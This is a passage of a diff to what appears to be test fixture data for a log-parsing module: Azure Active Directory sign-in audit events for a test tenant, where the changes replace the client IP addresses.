-3563,10 +3563,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-06T09:28:00", "ExtendedProperties": [ { @@ -3616,7 +3616,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d2ad235b-d73f-4bd8-8aef-6e4909ee1b7c\",\"InterSystemsId\":\"aca3d9a3-792d-4357-87c6-ef50c3215baa\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f714fa2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3634,10 +3634,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:28:52", "ExtendedProperties": [ { @@ -3687,7 +3687,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8ff18278-32ca-49d1-8658-91e577e0854f\",\"InterSystemsId\":\"ae211253-88cf-4921-9014-2f9beab64fb0\",\"IntraSystemId\":\"ccfec0f3-498b-43b1-a4c0-fb42f0fb5300\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3705,10 +3705,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:37", "ExtendedProperties": [ { @@ -3758,7 +3758,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a3939990-f7b4-4dc5-af4d-42b70a9485ea\",\"InterSystemsId\":\"b3997fcc-6b0e-45b1-b88d-b4ee4a8a7ddc\",\"IntraSystemId\":\"c1ffa732-6576-4f86-9294-44387abc1f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3776,10 +3776,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:28:52", "ExtendedProperties": [ { @@ -3829,7 +3829,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"61ba70f4-bd75-4bc2-a681-2e219d920e63\",\"InterSystemsId\":\"b3ab6d58-7b90-45d6-95e3-ee11333ebc34\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cb90424c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3847,10 +3847,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:01", "ExtendedProperties": [ { @@ -3900,7 +3900,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3e17bf8e-92de-45b6-b668-7618ab0e0c95\",\"InterSystemsId\":\"b5c5fd00-b659-413e-8739-6271a4d70506\",\"IntraSystemId\":\"fabbe34e-a6dd-46f8-805f-4ca633c2ae00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3918,10 +3918,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:53:12", "ExtendedProperties": [ { @@ -3971,7 +3971,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3989,10 +3989,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:52:06", "ExtendedProperties": [ { @@ -4042,7 +4042,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 